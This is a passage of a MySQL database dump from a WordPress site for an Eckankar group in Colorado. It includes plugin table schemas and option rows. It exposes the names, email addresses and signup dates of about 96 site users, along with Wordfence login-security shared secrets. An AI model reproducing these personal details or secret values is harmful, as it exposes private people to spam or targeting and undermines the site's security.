  `entry_id` bigint(20) unsigned DEFAULT NULL,
  `hash` varchar(255) DEFAULT NULL,
  `type` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_cf_pro_messages`
--

LOCK TABLES `wpcl_cf_pro_messages` WRITE;
/*!40000 ALTER TABLE `wpcl_cf_pro_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_cf_pro_messages` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_cf_pro_messages` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfblocks7`
--

DROP TABLE IF EXISTS `wpcl_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM AUTO_INCREMENT=40803 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfblocks7`
--

LOCK TABLES `wpcl_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wpcl_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfblocks7` with 0 row(s)
--

--
-- Table structure for table `wpcl_wfls_settings`
--

DROP TABLE IF EXISTS `wpcl_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfls_settings`
--

LOCK TABLES `wpcl_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wpcl_wfls_settings` DISABLE KEYS */;
INSERT INTO `wpcl_wfls_settings` VALUES ('2fa-user-grace-period',0x3130,'yes'),('allow-disabling-ntp',0x31,'yes'),('allow-xml-rpc',0x31,'yes'),('captcha-stats',0x7B22636F756E7473223A5B302C302C302C302C302C302C302C302C302C302C305D2C22617667223A307D,'yes'),('delete-deactivation','','yes'),('disable-temporary-tables',0x30,'yes'),('enable-auth-captcha','','yes'),('enable-login-history-columns',0x31,'yes'),('enable-shortcode','','yes'),('enable-woocommerce-account-integration','','yes'),('enable-woocommerce-integration','','yes'),('global-notices',0x5B5D,'yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh',0x31363837333634303933,'yes'),('ntp-failure-count',0x30,'yes'),('ntp-offset',0x302E3336343731313238343633373435,'yes'),('recaptcha-threshold',0x302E35,'yes'),('remember-device','','yes'),('remember-device-duration',0x32353932303030,'yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('schema-version',0x32,'yes'),('shared-hash-secret',0x64636335613033626235343664333332303938653461623838343433383761316235353363663334613330343065326334623565316364643835353765306464,'yes'),('shared-symmetric-secret',0x65376138313162333861323662643037333037373735663536303439613763643632366431333564646439393036396139626333656561336238643163323835,'yes'),('stack-ui-columns',0x31,'yes'),('use-ntp',0x31,'yes'),('user-count-query-state',0x30,'yes'),('whitelisted','','yes'),('xmlrpc-enabled',0x31,'yes');
/*!40000 ALTER TABLE `wpcl_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfls_settings` with 30 row(s)
--

--
-- Table structure for table `wpcl_mec_booking_attendees`
--

DROP TABLE IF EXISTS `wpcl_mec_booking_attendees`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_mec_booking_attendees` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `mec_booking_id` int(10) unsigned NOT NULL,
  `user_id` int(10) unsigned NOT NULL,
  `ticket_id` int(10) unsigned NOT NULL,
  PRIMARY KEY (`id`),
  KEY `mec_booking_id` (`mec_booking_id`)
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_mec_booking_attendees`
--

LOCK TABLES `wpcl_mec_booking_attendees` WRITE;
/*!40000 ALTER TABLE `wpcl_mec_booking_attendees` DISABLE KEYS */;
INSERT INTO `wpcl_mec_booking_attendees` VALUES (1,394,1000021,1),(2,395,1000021,1),(3,396,1000021,1),(4,397,1000021,1),(5,398,1000021,1),(6,399,1000021,1),(7,400,1000092,1),(8,401,1000023,1),(9,402,1000021,1),(10,403,1000061,1),(11,404,1000012,1),(12,405,1000021,1),(13,406,1000021,1),(14,407,1000024,1),(15,408,1000023,1),(16,409,1000061,1),(17,410,1000093,1),(18,411,1000094,1),(19,412,1000007,1),(20,413,1000023,1),(21,414,1000095,1);
/*!40000 ALTER TABLE `wpcl_mec_booking_attendees` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_booking_attendees` with 21 row(s)
--

--
-- Table structure for table `wpcl_wpgmza_polylines`
--

DROP TABLE IF EXISTS `wpcl_wpgmza_polylines`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wpgmza_polylines` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `map_id` int(11) NOT NULL,
  `polydata` longtext NOT NULL,
  `linecolor` varchar(7) NOT NULL,
  `linethickness` varchar(3) NOT NULL,
  `opacity` varchar(3) NOT NULL,
  `polyname` varchar(100) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wpgmza_polylines`
--

LOCK TABLES `wpcl_wpgmza_polylines` WRITE;
/*!40000 ALTER TABLE `wpcl_wpgmza_polylines` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wpgmza_polylines` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wpgmza_polylines` with 0 row(s)
--

--
-- Table structure for table `wpcl_mec_users`
--

DROP TABLE IF EXISTS `wpcl_mec_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_mec_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `first_name` varchar(255) NOT NULL,
  `last_name` varchar(255) NOT NULL,
  `email` varchar(127) NOT NULL,
  `reg` text DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` datetime NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`id`),
  UNIQUE KEY `email` (`email`)
) ENGINE=MyISAM AUTO_INCREMENT=1000096 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_mec_users`
--

LOCK TABLES `wpcl_mec_users` WRITE;
/*!40000 ALTER TABLE `wpcl_mec_users` DISABLE KEYS */;
INSERT INTO `wpcl_mec_users` VALUES (1000000,'Shauncie','','teamskidmore@gmail.com','[]','2022-05-01 01:56:26','2022-05-01 01:56:26'),(1000001,'Kelly','Walker ','kellywinfo@gmail.com','[]','2022-05-01 11:36:30','2022-05-01 11:36:30'),(1000002,'Andre','','mugarugaandrew@gmail.com','[]','2022-05-01 16:34:45','2022-05-01 16:34:45'),(1000003,'Sue','Haebig','sue2earth@msn.com','[]','2022-05-02 18:54:04','2022-05-02 18:54:04'),(1000004,'David','','class1coldwell@gmail.com','[]','2022-05-04 03:47:23','2022-05-04 03:47:23'),(1000005,'Jacqueline','Diane Roberts ','jackiediane1109@gmail.com','[]','2022-05-06 12:20:57','2022-05-06 12:20:57'),(1000006,'Dave','Ogletree','dogle007@yahoo.com','[]','2022-05-08 03:21:30','2022-05-08 03:21:30'),(1000007,'Marc','Massengale ','billybobak@yahoo.com','[]','2022-05-08 15:00:58','2022-05-08 15:00:58'),(1000008,'Jacqueline','Diane Roberts','jackiedianeroberts@icloud.com','[]','2022-05-08 15:07:37','2022-05-08 15:07:37'),(1000009,'Lynnzie','','lynnzies3@gmail.com','[]','2022-05-08 15:40:44','2022-05-08 15:40:44'),(1000010,'Uche','','uchenwamoh@yahoo.com','[]','2022-05-08 15:59:26','2022-05-08 15:59:26'),(1000011,'Michele','','sewgoodseed@gmail.com','[]','2022-05-08 16:33:24','2022-05-08 16:33:24'),(1000012,'Lynn','Gardner','lynnie626@gmail.com','[]','2022-05-08 16:41:41','2022-05-08 16:41:41'),(1000013,'Tony','Olih Nwaokolobia','acongem@gmail.com','[]','2022-05-08 16:53:58','2022-05-08 16:53:58'),(1000014,'kery','colvin','keanchico@yahoo.com','[]','2022-05-08 16:54:41','2022-05-08 16:54:41'),(1000015,'Linda','Mary','lindamaryk@hotmail.com','[]','2022-05-08 19:20:11','2022-05-08 19:20:11'),(1000016,'Elizabeth','Brandes','elizabethstar1@yahoo.com','[]','2022-05-14 16:17:57','2022-05-14 16:17:57'),(1000017,'Iyke','Uche','blueseausa@yahoo.com','[]','2022-05-22 22:52:59','2022-05-22 22:52:59'),(1000018,'Candy','Rushold','crushold@me.com','[]','2022-05-25 00:21:08','2022-05-25 00:21:08'),(1000019,'Diane','Haddenham','264haddenh@gmail.com','[]','2022-05-29 21:22:14','2022-05-29 21:22:14'),(1000020,'Joanne','Milelli','joanna3064@gmail.com','[]','2022-06-03 13:36:20','2022-06-03 13:36:20'),(1000021,'Christest','','choll.03@comcast.net','[]','2022-06-07 15:41:03','2022-06-07 15:41:03'),(1000022,'Jorge','Santiago','jiuuumaluk@gmail.com','[]','2022-06-12 00:29:22','2022-06-12 00:29:22'),(1000023,'Bonnie','Greenstreet','bngstreet@gmail.com','[]','2022-06-12 14:55:33','2022-06-12 14:55:33'),(1000024,'Roger','Morandi','rmorandi@comcast.net','[]','2022-06-12 15:26:14','2022-06-12 15:26:14'),(1000025,'Bella','Simons','bellasimons1@gmail.com','[]','2022-06-12 16:26:10','2022-06-12 16:26:10'),(1000026,'Tom','Walker','tomw2891@gmail.com','[]','2022-06-12 16:30:18','2022-06-12 16:30:18'),(1000027,'John','Wood','woodjohn185@gmail.com','[]','2022-06-12 16:32:11','2022-06-12 16:32:11'),(1000028,'Genesis','Brown ','edwardsgenesis21@gmail.com','[]','2022-06-12 16:49:40','2022-06-12 16:49:40'),(1000029,'Rebazar','allembe ','hospiceallembe@gmail.com','[]','2022-06-17 20:17:01','2022-06-17 20:17:01'),(1000030,'Marilyn','Millar','marilynmillarhu@gmail.com','[]','2022-06-19 14:34:00','2022-06-19 14:34:00'),(1000031,'Laurah','Brock young','laurahbrockyoung@gmail.com','[]','2022-06-22 19:51:16','2022-06-22 19:51:16'),(1000032,'Sarah','Cole ','stoneycole78@gmail.com','[]','2022-06-28 15:09:37','2022-06-28 15:09:37'),(1000033,'Hal','H','harusan@aol.com','[]','2022-07-10 07:48:16','2022-07-10 07:48:16'),(1000034,'Anna','Lafferty','alaffertyhu@gmail.com','[]','2022-07-10 16:20:11','2022-07-10 16:20:11'),(1000035,'Linda','Walker','stuart@olypen.com','[]','2022-07-10 16:20:55','2022-07-10 16:20:55'),(1000036,'Carolyn','Graff','zgraff@charter.net','[]','2022-07-10 16:23:27','2022-07-10 16:23:27'),(1000037,'Patrick','Reeves','p_b_reeves@msn.com','[]','2022-07-10 16:31:10','2022-07-10 16:31:10'),(1000038,'Renee','Wholey','renee4eck@hotmail.com','[]','2022-07-10 16:33:22','2022-07-10 16:33:22'),(1000039,'Nancy','','n.condon@yahoo.com','[]','2022-08-13 17:49:37','2022-08-13 17:49:37'),(1000040,'Darlene','Reed','darlenerreed@comcast.net','[]','2022-08-14 16:20:02','2022-08-14 16:20:02'),(1000041,'Russell','Reed','russellvreed@comcast.net','[]','2022-08-14 16:27:22','2022-08-14 16:27:22'),(1000042,'Lisa-Marie','Rousseau','lmrousseau@gmail.com','[]','2022-08-14 16:28:43','2022-08-14 16:28:43'),(1000043,'Gordon','garland','huusinger@comcast.net','[]','2022-08-20 01:33:42','2022-08-20 01:33:42'),(1000044,'Colleyna','Danler','colleynadanler@hotmail.com','[]','2022-08-20 03:40:39','2022-08-20 03:40:39'),(1000045,'Keli','Kinsella','kelik0@me.com','[]','2022-09-04 05:44:19','2022-09-04 05:44:19'),(1000046,'Penny','','pennycole57@gmail.com','[]','2022-09-11 16:26:05','2022-09-11 16:26:05'),(1000047,'Frances','','beth1848@yahoo.com','[]','2022-09-11 16:42:06','2022-09-11 16:42:06'),(1000048,'Rhonda','Miller','rhoann9@gmail.com','[]','2022-10-09 13:22:14','2022-10-09 13:22:14'),(1000049,'Marcia','Van Egmond','MVEpianist@gmail.com','[]','2022-10-09 14:44:03','2022-10-09 14:44:03'),(1000050,'Sandy(Tarzana','California)','sandykarlic@gmail.com','[]','2022-10-15 18:28:39','2022-10-15 18:28:39'),(1000051,'Alberto','Ruiz','rumipaz@gmail.com','[]','2022-11-01 04:26:10','2022-11-01 04:26:10'),(1000052,'Raelin','','Raelinharp@yahoo.com','[]','2022-11-06 17:23:48','2022-11-06 17:23:48'),(1000053,'Roger','Freed','inyear25252002@yahoo.com','[]','2022-11-12 02:57:05','2022-11-12 02:57:05'),(1000054,'Roger','Freed','freedroger9@gmail.com','[]','2022-11-13 17:26:33','2022-11-13 17:26:33'),(1000055,'Guy-Erne','','assika@guyerne.com','[]','2022-11-28 12:17:46','2022-11-28 12:17:46'),(1000056,'Marlene','Chapelle','huuu4luv@xplornet.com','[]','2022-12-11 14:38:02','2022-12-11 14:38:02'),(1000057,'Paul','Hanson','azpaulfh@aol.com','[]','2022-12-17 23:12:12','2022-12-17 23:12:12'),(1000058,'Elijah','Beard','einwrm@gmail.com','[]','2022-12-18 03:51:30','2022-12-18 03:51:30'),(1000059,'Brown','Ugbaja','nkemjikaugbaja@aol.com','[]','2022-12-18 04:33:14','2022-12-18 04:33:14'),(1000060,'Gai','Lawson','gai.lawson@icloud.com','[]','2022-12-18 15:45:39','2022-12-18 15:45:39'),(1000061,'Chukwuebuka','','ocekenedili@yahoo.com','[]','2022-12-18 18:58:08','2022-12-18 18:58:08'),(1000062,'Lexi','','alexareevesmassey@gmail.com','[]','2023-01-01 17:35:45','2023-01-01 17:35:45'),(1000063,'BJ','Wagner','bjinlohi@gmail.com','[]','2023-01-08 17:29:37','2023-01-08 17:29:37'),(1000064,'Abby','','abbynagbe@gmail.com','[]','2023-01-15 06:46:28','2023-01-15 06:46:28'),(1000065,'Lisa','Gage','Lisa1lg@aol.com','[]','2023-01-22 08:48:16','2023-01-22 08:48:16'),(1000066,'Chris','Gage','christo990@aol.com','[]','2023-01-22 08:53:05','2023-01-22 08:53:05'),(1000067,'CH','','chris4hu@outlook.com','[]','2023-01-24 16:34:46','2023-01-24 16:34:46'),(1000068,'Justyna','Furmanek','j_furmanek@msn.com','[]','2023-02-12 14:53:43','2023-02-12 14:53:43'),(1000069,'Micah','Ingram','musickidd28@gmail.com','[]','2023-02-27 17:05:50','2023-02-27 17:05:50'),(1000070,'LeAnn','','ponyexpressmama@yahoo.com','[]','2023-03-05 17:22:18','2023-03-05 17:22:18'),(1000071,'Elaine','Dahlgren','elainedahl@yahoo.com','[]','2023-03-05 17:57:44','2023-03-05 17:57:44'),(1000072,'Sue','Smith','suesmith332@gmail.com','[]','2023-03-07 03:07:54','2023-03-07 03:07:54'),(1000073,'Gai','Lawson','gai.lawson@gmail.com','[]','2023-03-10 14:41:55','2023-03-10 14:41:55'),(1000074,'Jessica','','lifedreamssolutions@gmail.com','[]','2023-03-12 15:38:30','2023-03-12 15:38:30'),(1000075,'Darlene',' Montgomery ','lifedreamsvision@gmail.com','[]','2023-03-12 16:01:56','2023-03-12 16:01:56'),(1000076,'Shannon','Everett','shannon.everett2018@outlook.com','[]','2023-03-12 16:29:55','2023-03-12 16:29:55'),(1000077,'Gerald','van Gogh','gvg1328@telus.net','[]','2023-03-30 14:05:05','2023-03-30 14:05:05'),(1000078,'Agnes','Hynes','amhynes7@msn.com','[]','2023-04-08 21:45:22','2023-04-08 21:45:22'),(1000079,'Roger','Morandi','utah.eckpres@gmail.com','[]','2023-04-09 04:06:42','2023-04-09 04:06:42'),(1000080,'Cindy','Mason','c.lotusheart@icloud.com','[]','2023-04-09 16:23:21','2023-04-09 16:23:21'),(1000081,'Eileen','Joy','eileenjoy12@gmail.com','[]','2023-04-09 16:37:20','2023-04-09 16:37:20'),(1000082,'Paige','Blake','Paigeblake89@yahoo.com','[]','2023-04-24 20:34:44','2023-04-24 20:34:44'),(1000083,'Anitha','Nakakena ','Antiasandsun@gmail.com','[]','2023-05-30 01:41:57','2023-05-30 01:41:57'),(1000084,'Mollie','','Molliesch@gmail.com','[]','2023-06-07 00:54:18','2023-06-07 00:54:18'),(1000085,'Allan','B','allanborenstein@yahoo.com','[]','2023-06-11 07:41:25','2023-06-11 07:41:25'),(1000086,'A','Greenstreet','agstreet11@gmail.com','[]','2023-06-11 16:20:08','2023-06-11 16:20:08'),(1000087,'Marc','Maqssengale','billybobvak@yahoo.com','[]','2023-06-11 16:22:39','2023-06-11 16:22:39'),(1000088,'Jeff','Law','lawless80537@gmail.com','[]','2023-06-27 20:41:52','2023-06-27 20:41:52'),(1000089,'Jack','Lile','bluehuuron@yahoo.com','[]','2023-07-02 15:59:31','2023-07-02 15:59:31'),(1000090,'Dirk','','dkolter@gmx.net','[]','2023-07-02 16:28:50','2023-07-02 16:28:50'),(1000091,'Marlene','Chapelle','marlenechapelle88@gmail.com','[]','2023-08-10 02:42:02','2023-08-10 02:42:02'),(1000092,'Kathy','Young','katyahuu@gmail.com','[]','2023-09-03 16:23:19','2023-09-03 16:23:19'),(1000093,'Lynn','','lynnschultept@gmail.com','[]','2023-10-08 16:29:58','2023-10-08 16:29:58'),(1000094,'Jenny','DeLapp Gallegos','jennydelapp@yahoo.com','[]','2023-11-12 14:38:07','2023-11-12 14:38:07'),(1000095,'Kim','Stoltman','kbatty11@yahoo.com','[]','2023-11-12 17:46:33','2023-11-12 17:46:33');
/*!40000 ALTER TABLE `wpcl_mec_users` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_users` with 96 row(s)
--

--
-- Table structure for table `wpcl_cf_queue_jobs`
--

DROP TABLE IF EXISTS `wpcl_cf_queue_jobs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_cf_queue_jobs` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `job` longtext NOT NULL,
  `attempts` tinyint(3) NOT NULL DEFAULT 0,
  `reserved_at` datetime DEFAULT NULL,
  `available_at` datetime NOT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_cf_queue_jobs`
--

LOCK TABLES `wpcl_cf_queue_jobs` WRITE;
/*!40000 ALTER TABLE `wpcl_cf_queue_jobs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_cf_queue_jobs` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_cf_queue_jobs` with 0 row(s)
--

--
-- Table structure for table `wpcl_options`
--

DROP TABLE IF EXISTS `wpcl_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=7608710 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_options`
--

LOCK TABLES `wpcl_options` WRITE;
/*!40000 ALTER TABLE `wpcl_options` DISABLE KEYS */;
INSERT INTO `wpcl_options` VALUES (1,'siteurl','https://eckankar-colorado.org','yes'),(2,'home','https://eckankar-colorado.org','yes'),(3,'blogname','Eckankar In Colorado','yes'),(4,'blogdescription','Past Lives, Dreams, and Soul Travel','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','webmaster@eckankar-colorado.org','yes'),(7,'start_of_week','0','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:40:{i:0;s:19:\"404page/404page.php\";i:1;s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";i:2;s:37:\"async-javascript/async-javascript.php\";i:3;s:27:\"autoptimize/autoptimize.php\";i:4;s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";i:5;s:35:\"boldgrid-backup/boldgrid-backup.php\";i:6;s:39:\"boldgrid-easy-seo/boldgrid-easy-seo.php\";i:7;s:31:\"code-snippets/code-snippets.php\";i:9;s:37:\"disable-comments/disable-comments.php\";i:10;s:33:\"duplicate-post/duplicate-post.php\";i:11;s:25:\"fluentform/fluentform.php\";i:12;s:23:\"folders-pro/folders.php\";i:13;s:43:\"ga-google-analytics/ga-google-analytics.php\";i:14;s:36:\"google-sitemap-generator/sitemap.php\";i:15;s:65:\"html-editor-syntax-highlighter/html-editor-syntax-highlighter.php\";i:16;s:35:\"insert-headers-and-footers/ihaf.php\";i:17;s:31:\"kt-tinymce-color-grid/index.php\";i:18;s:41:\"mec-fluent-layouts/mec-fluent-layouts.php\";i:19;s:41:\"mec-liquid-layouts/mec-liquid-layouts.php\";i:20;s:30:\"modern-events-calendar/mec.php\";i:21;s:35:\"modula-best-grid-gallery/Modula.php\";i:22;s:27:\"ninja-forms/ninja-forms.php\";i:23;s:39:\"plugin-notes-plus/plugin-notes-plus.php\";i:24;s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";i:25;s:47:\"post-and-page-builder/post-and-page-builder.php\";i:26;s:30:\"protect-the-children/index.php\";i:27;s:27:\"redis-cache/redis-cache.php\";i:28;s:45:\"remember-me-controls/remember-me-controls.php\";i:29;s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";i:30;s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";i:31;s:42:\"scripts-to-footerphp/scripts-to-footer.php\";i:32;s:39:\"simple-custom-css/simple-custom-css.php\";i:33;s:24:\"simple-history/index.php\";i:34;s:55:\"styler-for-ninja-forms-lite/ninja-forms-styler-lite.php\";i:35;s:37:\"tinymce-advanced/tinymce-advanced.php\";i:36;s:27:\"updraftplus/updraftplus.php\";i:37;s:23:\"wordfence/wordfence.php\";i:38;s:35:\"wp-fastest-cache/wpFastestCache.php\";i:39;s:27:\"wp-optimize/wp-optimize.php\";i:40;s:25:\"wp-staging/wp-staging.php\";}','yes'),(34,'category_base','/.','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:72:\"/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/functions.php\";i:1;s:72:\"/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/page_home.php\";i:3;s:68:\"/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/style.css\";i:4;s:104:\"/home/eckank5/public_html/wp-content/plugins/modern-events-calendar-lite/templates/single-mec-events.php\";i:5;s:104:\"/home/eckank5/public_html/wp-content/plugins/modern-events-calendar-lite/modern-events-calendar-lite.php\";}','no'),(40,'template','boldgrid-hydra','yes'),(41,'stylesheet','boldgrid-hydra','yes'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','56657','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','350','yes'),(62,'medium_size_h','196','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:15:{s:39:\"simple-custom-css/simple-custom-css.php\";s:15:\"sccss_uninstall\";s:27:\"ninja-forms/ninja-forms.php\";s:21:\"ninja_forms_uninstall\";s:38:\"wonderplugin-tabs/wonderplugintabs.php\";s:27:\"wonderplugin_tabs_uninstall\";s:25:\"loginpress/loginpress.php\";a:2:{i:0;s:10:\"LoginPress\";i:1;s:21:\"plugin_uninstallation\";}s:27:\"wp-optimize/wp-optimize.php\";a:2:{i:0;s:13:\"WPO_Uninstall\";i:1;s:7:\"actions\";}s:42:\"peters-login-redirect/wplogin_redirect.php\";s:13:\"rul_uninstall\";s:27:\"autoptimize/autoptimize.php\";s:29:\"autoptimizeMain::on_uninstall\";s:41:\"show-hidecollapse-expand/bg_show_hide.php\";s:29:\"bg_show_hide_plugin_uninstall\";s:30:\"modern-events-calendar/mec.php\";a:2:{i:0;s:11:\"MEC_factory\";i:1;s:9:\"uninstall\";}s:27:\"popup-maker/popup-maker.php\";a:2:{i:0;s:11:\"PUM_Install\";i:1;s:16:\"uninstall_plugin\";}s:37:\"user-role-editor/user-role-editor.php\";a:2:{i:0;s:16:\"User_Role_Editor\";i:1;s:9:\"uninstall\";}s:39:\"sitemap-by-click5/sitemap-by-click5.php\";s:32:\"click5_sitemap_uninstallFunction\";s:35:\"litespeed-cache/litespeed-cache.php\";s:47:\"LiteSpeed\\Activation::uninstall_litespeed_cache\";s:45:\"enable-media-replace/enable-media-replace.php\";s:33:\"\\EnableMediaReplace\\emr_uninstall\";s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";a:2:{i:0;s:15:\"WPCaptcha_Setup\";i:1;s:9:\"uninstall\";}}','no'),(82,'timezone_string','America/Denver','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','7160','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','268103','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'wp_page_for_privacy_policy','3','yes'),(92,'show_comments_cookies_opt_in','1','yes'),(93,'initial_db_version','44719','yes'),(94,'wpcl_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:162:{s:13:\"switch_themes\";b:1;s:11:\"edit_theme